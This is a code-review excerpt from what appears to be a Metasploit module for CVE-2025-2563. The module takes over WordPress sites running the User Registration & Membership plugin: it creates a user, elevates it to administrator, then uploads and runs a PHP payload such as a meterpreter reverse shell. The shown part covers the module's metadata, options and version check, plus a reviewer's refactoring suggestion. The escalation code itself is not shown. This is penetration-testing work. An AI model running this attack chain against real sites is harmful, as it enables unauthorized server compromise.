modules/exploits/multi/http/wp_user_registration_membership_escalation.rb

```diff
@@ -0,0 +1,314 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WP User Registration and Membership Unauthenticated Privilege Escalation (CVE-2025-2563)',
+        'Description' => %q{
+          Exploits CVE-2025-2563 in the WordPress User Registration & Membership plugin.
+          1) Registers a free-membership user via AJAX.
+          2) Elevates that user to administrator via the membership AJAX action.
+          3) Logs in, uploads & executes a PHP payload.
+        },
+        'Author' => [
+          'wesley (wcraft)',  # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-2563'],
+          ['WPVDB', '2c0f62a1-9510-4f90-a297-17634e6c8b75'],
+          ['URL', 'https://pentest-tools.com/vulnerabilities-exploits/user-registration-and-membership-411-unauthenticated-privilege-escalation_26968']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => %w[php unix linux win],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-03-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]),
+        OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]),
+        OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))])
+      ]
+    )
+  end
+
+  def check
+    return CheckCode::Unknown('Target not responding') unless wordpress_and_online?
+
+    wp_version = wordpress_version
+    print_status("Detected WordPress version: #{wp_version}") if wp_version
+
+    plugins = {
+      'user-registration' => '4.1.2',
+      'user-registration-pro' => '5.1.2'
+    }
+
+    plugins.each do |slug, fixed_version|
+      readme = check_plugin_version_from_readme(slug, fixed_version, '0.0.1')
+      version = readme&.details&.dig(:version)
```

Comment:
Wouldn't this work as well? 
```suggestion
      version = readme&.dig(:details, :version)
```